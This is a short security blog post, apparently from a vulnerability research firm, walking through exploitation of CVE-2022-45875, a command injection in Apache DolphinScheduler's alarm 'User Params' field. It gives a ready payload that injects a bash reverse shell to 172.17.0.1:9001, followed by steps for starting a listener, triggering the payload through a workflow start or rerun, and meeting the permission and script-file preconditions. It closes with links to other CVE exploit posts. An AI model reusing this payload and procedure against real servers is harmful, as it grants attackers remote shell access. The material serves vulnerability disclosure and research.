Apr 27, 2023
Improper Input Validation leads to command injection/RCE in #Apache #DolphinScheduler has been found and registered as #CVE-2022-45875
We already published the analysis blog for this CVE, breaking down what's going behind the scenes, you can check it from here:
Supposing you already found an alarm you can edit or create a new one.
Add the following payload
'; echo "sh -i >& /dev/tcp/172.17.0.1/9001 0>&1"|bash;# to the "User Params"
Run your listener
There are two ways to lunch the exploit now
Go to "Projects>Click on the project name>Worflow Definition>Start"
This is already mentioned in the analysis blog.
Go to "Projects>Click on the project name>Worflow instance>Rerun"
Usually, when you access Apache DolphinScheduler you will find tenants, alarms, and project, workflows are ready.
You need to make sure that you have the permissions to edit the alarm so you can add your payload, and at least run workflow so you can decide which alarm group will run for notification. if you can run a workflow and choose the alarm group that includes the malicious one, you will be able to exploit it.
You need a script that exists in the server already, so when the alarm gets triggered it will trigger the payload as well because there are multiple checks and one of them check if the script file exists or not. for more information about this check the analysis blog.
In a previous analysis blog, I explained how the Apache DolphinScheduler CVE-2022-45875 happens. in this, I'm explaining how to get remote access through RCE by exploiting Apache DolphinScheduler CVE-2022-45875 😈
Microsoft Windows Contacts (VCF/Contact/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day)j00sean (https://twitter.com/j00sean) July 11, 2023
CVE-2021-38294: Apache Storm Nimbus Command InjectionZeyad Abdelazim June 20, 2023
CVE-2023-21931 & CVE-2023-21839 RCE via post-deserializationMohammad Hussam Alzeyyat June 19, 2023
Have you missed them? The new reports feature is here!Noa Machter May 14, 2023
CVE-2021-45456 Apache Kylin RCE ExploitMohammad Hussam Alzeyyat April 30, 2023